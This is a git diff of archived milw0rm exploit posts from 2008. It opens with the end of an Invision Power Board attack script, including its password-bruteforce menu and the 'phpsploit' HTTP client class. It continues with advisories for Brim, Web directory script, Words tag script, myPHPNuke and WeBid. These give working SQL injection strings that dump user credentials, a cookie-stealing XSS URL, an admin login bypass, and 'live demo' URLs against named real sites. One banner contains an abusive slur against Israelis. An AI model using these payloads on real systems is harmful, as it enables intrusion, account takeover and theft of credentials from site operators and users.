+ print " -url IPB url with ending slash\n\n";
+ print " -uname targeted username\n";
+ print " -uid OR the targeted user id (def: 1)\n\n";
+ print " -prefix sql table prefix (def: ibf_)\n";
+ print " -acp admin control panel path (def: admin)\n\n\n";
+ print " 2 - Insecure SQL password usage\n\n";
+ print " -ip your current IP\n";
+ print " -dict a wordlist file\n\n";
+ print " -url IPB url with ending slash\n";
+ print " -uname a valid member username\n";
+ print " -pwd the associated password\n\n";
+ print " -uid OR the targeted member id\n";
+ print " -passhash the passhash cookie value\n";
+ print " -stronghold the stronghold cookie value\n\n";
+ print " -sqlusr you can precise the sql user\n";
+ print " -prefix sql table prefix (def: ibf_)\n\n\n";
+ print " 3 - Password bruteforcer\n\n";
+ print " -dict a wordlist file\n\n";
+ print " -url IPB url with ending slash\n";
+ print " -uname targeted username\n";
+ print " -uid OR the targeted user id (def: 1)\n";
+ print " -prefix sql table prefix (def: ibf_)\n\n";
+ print " -passhash OR the passhash value\n";
+ print " -salt the salt value\n\n\n";
+ print " Optional: \n\n";
+ print " -proxhost if you wanna use a proxy\n";
+ print " -proxauth proxy with authentication\n";
+
+ exit(1);
+ }
+
+}
+
+
+
+/*
+ *
+ * Copyright (C) darkfig
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License
+ * as published by the Free Software Foundation; either version 2
+ * of the License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * TITLE: PhpSploit Class
+ * REQUIREMENTS: PHP 4 / PHP 5
+ * VERSION: 2.1
+ * LICENSE: GNU General Public License
+ * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME: phpsploitclass.php
+ *
+ * CONTACT: gmdarkfig@gmail.com (french / english)
+ * GREETZ: Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ *
+ * [2008-08-29] (2.1)
+ * * New: The showheader()/showcookie() functions can now return an array
+ * * Bug #3 fixed: Problem concerning some servers for the main function
+ *
+ * [2007-06-10] (2.0)
+ * * Code: Code optimization
+ * * New: Compatible with PHP 4 by default
+ *
+ * [2007-01-24] (1.2)
+ * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ * * New: multipart/form-data enctype is now supported
+ *
+ * [2006-12-31] (1.1)
+ * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ * * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ * * First version
+ *
+ */
+
+class phpsploit
+{
+ var $proxyhost;
+ var $proxyport;
+ var $host;
+ var $path;
+ var $port;
+ var $method;
+ var $url;
+ var $packet;
+ var $proxyuser;
+ var $proxypass;
+ var $header;
+ var $cookie;
+ var $data;
+ var $boundary;
+ var $allowredirection;
+ var $last_redirection;
+ var $cookiejar;
+ var $recv;
+ var $cookie_str;
+ var $header_str;
+ var $server_content;
+ var $server_header;
+
+
+ /**
+ * This function is called by the
+ * get()/post()/formdata() functions.
+ * You don't have to call it, this is
+ * the main function.
+ *
+ * @access private
+ * @return string $this->recv ServerResponse
+ *
+ */
+ function sock()
+ {
+ if(!empty($this->proxyhost) && !empty($this->proxyport))
+ $socket = @fsockopen($this->proxyhost,$this->proxyport);
+ else
+ $socket = @fsockopen($this->host,$this->port);
+
+ if(!$socket)
+ die("Error: Host seems down");
+
+ if($this->method=='get')
+ $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
+
+ elseif($this->method=='post' or $this->method=='formdata')
+ $this->packet = 'POST '.$this->url."
HTTP/1.1\r\n";
+
+ else
+ die("Error: Invalid method");
+
+ if(!empty($this->proxyuser))
+ $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
+
+ if(!empty($this->header))
+ $this->packet .= $this->showheader();
+
+ if(!empty($this->cookie))
+ $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
+
+ $this->packet .= 'Host: '.$this->host."\r\n";
+ $this->packet .= "Connection: Close\r\n";
+
+ if($this->method=='post')
+ {
+ $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+ $this->packet .= $this->data."\r\n";
+ }
+ elseif($this->method=='formdata')
+ {
+ $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
+ $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+ $this->packet .= $this->data;
+ }
+
+ $this->packet .= "\r\n";
+ $this->recv = '';
+
+ fputs($socket, $this->packet);
+
+ while(!feof($socket))
+ $this->recv .= fgets($socket);
+
+ fclose($socket);
+
+ if($this->cookiejar)
+ $this->getcookie();
+
+ if($this->allowredirection)
+ return $this->getredirection();
+ else
+ return $this->recv;
+ }
+
+
+ /**
+ * This function allows you to add several
+ * cookies in the request.
+ *
+ * @access public
+ * @param string cookn CookieName
+ * @param string cookv CookieValue
+ * @example $this->addcookie('name','value')
+ *
+ */
+ function addcookie($cookn,$cookv)
+ {
+ if(!isset($this->cookie))
+ $this->cookie = array();
+
+ $this->cookie[$cookn] = $cookv;
+ }
+
+
+ /**
+ * This function allows you to add several
+ * headers in the request.
+ *
+ * @access public
+ * @param string headern HeaderName
+ * @param string headervalue Headervalue
+ * @example $this->addheader('Client-IP', '128.5.2.3')
+ *
+ */
+ function addheader($headern,$headervalue)
+ {
+ if(!isset($this->header))
+ $this->header = array();
+
+ $this->header[$headern] = $headervalue;
+ }
+
+ /**
+ * This function allows you to use an
+ * http proxy server. Several methods
+ * are supported.
+ *
+ * @access public
+ * @param string proxy ProxyHost
+ * @param integer proxyp ProxyPort
+ * @example $this->proxy('localhost',8118)
+ * @example $this->proxy('localhost:8118')
+ *
+ */
+ function proxy($proxy,$proxyp='')
+ {
+ if(empty($proxyp))
+ {
+ $proxarr = explode(':',$proxy);
+ $this->proxyhost = $proxarr[0];
+ $this->proxyport = (int)$proxarr[1];
+ }
+ else
+ {
+ $this->proxyhost = $proxy;
+ $this->proxyport = (int)$proxyp;
+ }
+
+ if($this->proxyport > 65535)
+ die("Error: Invalid port number");
+ }
+
+
+ /**
+ * This function allows you to use an
+ * http proxy server which requires a
+ * basic authentification. Several
+ * methods are supported:
+ *
+ * @access public
+ * @param string proxyauth ProxyUser
+ * @param string proxypass ProxyPass
+ * @example $this->proxyauth('user','pwd')
+ * @example $this->proxyauth('user:pwd');
+ *
+ */
+ function proxyauth($proxyauth,$proxypass='')
+ {
+ if(empty($proxypass))
+ {
+ $posvirg = strpos($proxyauth,':');
+ $this->proxyuser = substr($proxyauth,0,$posvirg);
+ $this->proxypass = substr($proxyauth,$posvirg+1);
+ }
+ else
+ {
+ $this->proxyuser = $proxyauth;
+ $this->proxypass = $proxypass;
+ }
+ }
+
+
+ /**
+ * This function allows you to set
+ * the 'User-Agent' header.
+ *
+ * @access public
+ * @param string useragent Agent
+ * @example $this->agent('Firefox')
+ *
+ */
+ function agent($useragent)
+ {
+ $this->addheader('User-Agent',$useragent);
+ }
+
+
+ /**
+ * This function returns the headers
+ * which will be in the next request.
+ *
+ * @access public
+ * @return string $this->header_str Headers
+ * @return array $this->head Headers
+ * @example $this->showheader()
+ * @example $this->showheader(1)
+ *
+ */
+ function showheader($array='')
+ {
+ $this->header_str = '';
+
+ if(!isset($this->header))
+ return;
+
+ if(!empty($array))
+ return $this->header;
+
+ foreach($this->header as $name => $value)
+ $this->header_str .= $name.': '.$value."\r\n";
+
+ return $this->header_str;
+ }
+
+
+ /**
+ * This function returns the cookies
+ * which will be in the next request.
+ *
+ * @access public
+ * @return string $this->cookie_str Cookies
+ * @return array $this->cookie Cookies
+ * @example $this->showcookie()
+ * @example $this->showcookie(1)
+ *
+ */
+ function showcookie($array='')
+ {
+ if(!isset($this->cookie))
+ return;
+
+ if(!empty($array))
+ return $this->cookie;
+
+ $this->cookie_str = '';
+
+ foreach($this->cookie as $name => $value)
+ $this->cookie_str .= $name.'='.$value.'; ';
+
+ return $this->cookie_str;
+ }
+
+
+ /**
+ * This function returns the last
+ * formed http request.
+ *
+ * @access public
+ * @return string $this->packet HttpPacket
+ * @example $this->showlastrequest()
+ *
+ */
+ function showlastrequest()
+ {
+ if(!isset($this->packet))
+ return;
+ else
+ return $this->packet;
+ }
+
+
+ /**
+ * This function sends the formed
+ * http packet with the GET method.
+ *
+ * @access public
+ * @param string url Url
+ * @return string $this->sock()
+ * @example $this->get('localhost/index.php?var=x')
+ * @example $this->get('http://localhost:88/tst.php')
+ *
+ */
+ function get($url)
+ {
+ $this->target($url);
+ $this->method = 'get';
+ return $this->sock();
+ }
+
+
+ /**
+ * This function sends the formed
+ * http packet with the POST method.
+ *
+ * @access public
+ * @param string url Url
+ * @param string data PostData
+ * @return string $this->sock()
+ * @example $this->post('http://localhost/','helo=x')
+ *
+ */
+ function post($url,$data)
+ {
+ $this->target($url);
+ $this->method = 'post';
+ $this->data = $data;
+ return $this->sock();
+ }
+
+
+ /**
+ * This function sends the formed http
+ * packet with the POST method using
+ * the multipart/form-data enctype.
+ *
+ * @access public
+ * @param array array FormDataArray
+ * @return string $this->sock()
+ * @example $formdata = array(
+ * frmdt_url => 'http://localhost/upload.php',
+ * frmdt_boundary => '123456', # Optional
+ * 'var' => 'example',
+ * 'file' => array(
+ * frmdt_type => 'image/gif', # Optional
+ * frmdt_transfert => 'binary' # Optional
+ * frmdt_filename => 'hello.php,
+ * frmdt_content => ''));
+ * $this->formdata($formdata);
+ *
+ */
+ function formdata($array)
+ {
+ $this->target($array[frmdt_url]);
+ $this->method = 'formdata';
+ $this->data = '';
+
+ if(!isset($array[frmdt_boundary]))
+ $this->boundary = 'phpsploit';
+ else
+ $this->boundary = $array[frmdt_boundary];
+
+ foreach($array as $key => $value)
+ {
+ if(!preg_match('#^frmdt_(boundary|url)#',$key))
+ {
+ $this->data .= str_repeat('-',29).$this->boundary."\r\n";
+ $this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
+
+ if(!is_array($value))
+ {
+ $this->data .= "\r\n\r\n".$value."\r\n";
+ }
+ else
+ {
+ $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
+
+ if(isset($array[$key][frmdt_type]))
+ $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
+
+ if(isset($array[$key][frmdt_transfert]))
+ $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
+
+ $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+ }
+ }
+ }
+
+ $this->data .= str_repeat('-',29).$this->boundary."--\r\n";
+ return $this->sock();
+ }
+
+
+ /**
+ * This function returns the content
+ * of the server response, without
+ *
the headers. + * + * @access public + * @param string code ServerResponse + * @return string $this->server_content + * @example $this->getcontent() + * @example $this->getcontent($this->get('http://localhost/')) + * + */ + function getcontent($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_content = ''; + + for($i=1;$iserver_content .= $code[$i]; + + return $this->server_content; + } + + + /** + * This function returns the headers + * of the server response, without + * the content. + * + * @access public + * @param string code ServerResponse + * @return string $this->server_header + * @example $this->getcontent() + * @example $this->getcontent($this->post('http://localhost/','1=2')) + * + */ + function getheader($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_header = $code[0]; + + return $this->server_header; + } + + + /** + * This function is called by the + * cookiejar() function. It adds the + * value of the "Set-Cookie" header + * in the "Cookie" header for the + * next request. You don't have to + * call it. + * + * @access private + * @param string code ServerResponse + * + */ + function getcookie() + { + foreach(explode("\r\n",$this->getheader()) as $header) + { + if(preg_match('/set-cookie/i',$header)) + { + $fequal = strpos($header,'='); + $fvirgu = strpos($header,';'); + + // 12=strlen('set-cookie: ') + $cname = substr($header,12,$fequal-12); + $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); + + $this->cookie[trim($cname)] = trim($cvalu); + } + } + } + + + /** + * This function is called by the + * get()/post() functions. You + * don't have to call it. 
+ *
+ * @access private
+ * @param string urltarg Url
+ * @example $this->target('http://localhost/')
+ *
+ */
+ function target($urltarg)
+ {
+ if(!ereg('^http://',$urltarg))
+ $urltarg = 'http://'.$urltarg;
+
+ $urlarr = parse_url($urltarg);
+
+ if(!isset($urlarr['path']) || empty($urlarr['path']))
+ die("Error: No path precised");
+
+ $this->url = $urlarr['path'];
+
+ if(isset($urlarr['query']))
+ $this->url .= '?'.$urlarr['query'];
+
+ $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
+ $this->host = $urlarr['host'];
+
+ if($this->port != '80')
+ $this->host .= ':'.$this->port;
+
+ $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
+
+ if($this->port > 65535)
+ die("Error: Invalid port number");
+ }
+
+
+ /**
+ * If you call this function,
+ * the script will extract all
+ * 'Set-Cookie' headers values
+ * and it will automatically add
+ * them into the 'Cookie' header
+ * for all next requests.
+ *
+ * @access public
+ * @param integer code 1(enabled) 0(disabled)
+ * @example $this->cookiejar(0)
+ * @example $this->cookiejar(1)
+ *
+ */
+ function cookiejar($code)
+ {
+ if($code=='0')
+ $this->cookiejar=FALSE;
+
+ elseif($code=='1')
+ $this->cookiejar=TRUE;
+ }
+
+
+ /**
+ * If you call this function,
+ * the script will follow all
+ * redirections sent by the server.
+ *
+ * @access public
+ * @param integer code 1(enabled) 0(disabled)
+ * @example $this->allowredirection(0)
+ * @example $this->allowredirection(1)
+ *
+ */
+ function allowredirection($code)
+ {
+ if($code=='0')
+ $this->allowredirection=FALSE;
+
+ elseif($code=='1')
+ $this->allowredirection=TRUE;
+ }
+
+
+ /**
+ * This function is called if
+ * allowredirection() is enabled.
+ * You don't have to call it.
+ *
+ * @access private
+ * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+ * @return string $this->get($this->last_redirection)
+ * @return string $this->recv;
+ *
+ */
+ function getredirection()
+ {
+ if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+ {
+ $this->last_redirection = trim($codearr[2]);
+
+ if(!ereg('://',$this->last_redirection))
+ return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+ else
+ return $this->get($this->last_redirection);
+ }
+ else
+ return $this->recv;
+ }
+
+
+ /**
+ * This function allows you
+ * to reset some parameters.
+ *
+ * @access public
+ * @param string func Param
+ * @example $this->reset('header')
+ * @example $this->reset('cookie')
+ * @example $this->reset()
+ *
+ */
+ function reset($func='')
+ {
+ switch($func)
+ {
+ case 'header':
+ $this->header = array();
+ break;
+
+ case 'cookie':
+ $this->cookie = array();
+ break;
+
+ default:
+ $this->cookiejar = '';
+ $this->header = array();
+ $this->cookie = array();
+ $this->allowredirection = '';
+ break;
+ }
+ }
+}
+
+$web = new phpsploit;
+$web->cookiejar(1);
+$web->agent('Mozilla Firefox');
+
+$ipb = new ipb_spl;
+$ipb->web =& $web;
+$ipb->main();
+
+?>
+
+# milw0rm.com [2008-08-29]
diff --git a/platforms/php/webapps/6332.txt b/platforms/php/webapps/6332.txt
index 789dde99e..debe48a3b 100755
--- a/platforms/php/webapps/6332.txt
+++ b/platforms/php/webapps/6332.txt
@@ -1,75 +1,75 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - -<> Found by : Fisher762 -<> C0ntact : SQ7@W.CN - -<> Groups : InjEctOr5 - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - -<<->> script : Brim 2.0 - -<<->> Demo site : http://sourceforge.net/project/showfiles.php?group_id=129562 - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - -<<->> D0rk : :) -<<->> Exploit : - -[SQL] - -First register new acc0unt : - -http://[targ3t]/brim/signup.php - -then go to y0ur email and active the acc0unt and login - - - -after that G0 t0 y0ur Plugins and active Tasks plugin - -http://[Targ3t]/brim/PluginController.php - -and finnaly go t0 search url: - -http://[Targ3t]/brim/index.php?plugin=tasks&action=search - -and insert this query in any field: - -' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/* - -******************************************************************************************************* - -[xss] - -First active Bookmarks Plugin and add new action and in the name field insert: - ->"> - - - - - 
-############################################################## - -#Gr33tz T0: Broken-security, providor , Şŷяįăn ĦλçЌΣr ,Sp!der_N3T and all my friends :) - -# milw0rm.com [2008-08-30] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + +<> Found by : Fisher762 +<> C0ntact : SQ7@W.CN + +<> Groups : InjEctOr5 + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + +<<->> script : Brim 2.0 + +<<->> Demo site : http://sourceforge.net/project/showfiles.php?group_id=129562 + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + +<<->> D0rk : :) +<<->> Exploit : + +[SQL] + +First register new acc0unt : + +http://[targ3t]/brim/signup.php + +then go to y0ur email and active the acc0unt and login + + + +after that G0 t0 y0ur Plugins and active Tasks plugin + +http://[Targ3t]/brim/PluginController.php + +and finnaly go t0 search url: + +http://[Targ3t]/brim/index.php?plugin=tasks&action=search + +and insert this query in any field: + +' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/* + 
+******************************************************************************************************* + +[xss] + +First active Bookmarks Plugin and add new action and in the name field insert: + +>"> + + + + + +############################################################## + +#Gr33tz T0: Broken-security, providor , Şŷяįăn ĦλçЌΣr ,Sp!der_N3T and all my friends :) + +# milw0rm.com [2008-08-30] diff --git a/platforms/php/webapps/6335.txt b/platforms/php/webapps/6335.txt index 24b8b7c1e..f650019cb 100755 --- a/platforms/php/webapps/6335.txt +++ b/platforms/php/webapps/6335.txt 
@@ -1,59 +1,59 @@ -|___________________________________________________| -| -| Web directory script v1.5.3 (site) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://sourceworkshop.com/advanced_scripts/web_directory_script.html -| -| DorK : "Powered by web directory script" -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())-- - - - - -L!VE DEMO: -_________ - - -http://links.sourceworkshop.com/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())-- - - - - -admin login - -admin/index.php - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe -| -| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-08-31] +|___________________________________________________| +| +| Web directory script v1.5.3 (site) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script : http://sourceworkshop.com/advanced_scripts/web_directory_script.html +| +| DorK : "Powered by web directory script" +|___________________________________________________| + +Exploit: +________ + + + 
+www.[target].com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())-- + + + + +L!VE DEMO: +_________ + + +http://links.sourceworkshop.com/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())-- + + + + +admin login + +admin/index.php + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe +| +| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-08-31] diff --git a/platforms/php/webapps/6336.txt b/platforms/php/webapps/6336.txt index 9de8509f2..e8b4c1bf1 100755 --- a/platforms/php/webapps/6336.txt +++ b/platforms/php/webapps/6336.txt 
@@ -1,67 +1,67 @@ -|___________________________________________________| -| -| Words tag script v1.2 (word) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://sourceworkshop.com/advanced_scripts/index.php?id=5 -| -| DorK : "Powered by words tag script" -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables-- - - - - - - -L!VE DEMO: -_________ - - -http://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables-- - - -________________________ - -table_name : column_name - -config_variables:variable_name -config_variables:value -config_variables:id -config_variables:title -config_variables:text -config_variables:description -_______________________ - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe -| -| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-08-31] +|___________________________________________________| +| +| Words tag script v1.2 (word) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| 
+| script : http://sourceworkshop.com/advanced_scripts/index.php?id=5 +| +| DorK : "Powered by words tag script" +|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables-- + + + + + + +L!VE DEMO: +_________ + + +http://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables-- + + +________________________ + +table_name : column_name + +config_variables:variable_name +config_variables:value +config_variables:id +config_variables:title +config_variables:text +config_variables:description +_______________________ + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe +| +| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-08-31] diff --git a/platforms/php/webapps/6338.txt b/platforms/php/webapps/6338.txt index 6443b5779..a9ff02ea0 100755 --- a/platforms/php/webapps/6338.txt +++ b/platforms/php/webapps/6338.txt 
@@ -1,25 +1,25 @@
-############################################################
-
-Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke
-
-By MustLive (http://websecurity.com.ua)
-
-Detailed information: http://websecurity.com.ua/2391/
-
-Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.
-
-XSS:
-
-http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
-
-SQL Injection:
-
-http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
-
-With this query you will receive login and password (hash) of administrator.
-
-Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).
-
-############################################################
-
-# milw0rm.com [2008-08-31]
+############################################################
+
+Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke
+
+By MustLive (http://websecurity.com.ua)
+
+Detailed information: http://websecurity.com.ua/2391/
+
+Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.
+
+XSS:
+
+http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
+
+SQL Injection:
+
+http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
+
+With this query you will receive login and password (hash) of administrator.
+
+Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).
+
+############################################################
+
+# milw0rm.com [2008-08-31]
diff --git a/platforms/php/webapps/6339.txt b/platforms/php/webapps/6339.txt
index e82135772..b635c1f2b 100755
--- a/platforms/php/webapps/6339.txt
+++ b/platforms/php/webapps/6339.txt
@@ -1,92 +1,92 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . - ================================ - ========================== - ==================== -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - - -Application :: WeBid v0.5.4 Multi Exploit - -Found By :: Fisher762 [ SQ7@w.cn ] - - Groups : InjEctOr5 - - - -Download :: http://www.sourceforge.net/projects/simpleauction - -Dork 1 :: :P - -###########################[[[[EXPL0!T]]]]]################################# - - -[Bybpass] - - - - -Go to admin pannel - - -http://[Targ3t]/[webid]/admin/ - - - - -username= ' or 1=1/* - -password= ass u like :) - - -__________________________________________________________________________ - - -[ edit index css ] - - - -u can edit style css file [style.css] - - -http://[Targ3t]/webid/eledicss.php?nid=0&cd=themes/default&file=style.css - - -eX: http://www.fondoempleados.com/eledicss.php?nid=0&cd=themes/default&file=style.css - - - -__________________________________________________________________________ - - -[ view all Site SQL quires] - - - - -u can see all SQL quires - - - -http://[Targ3t]/webid/logs/cron.log - - -eX: http://www.hardlyeverwornit.com//logs/cron.log - - -###########################[[[[Th3 End]]]]]################################# - 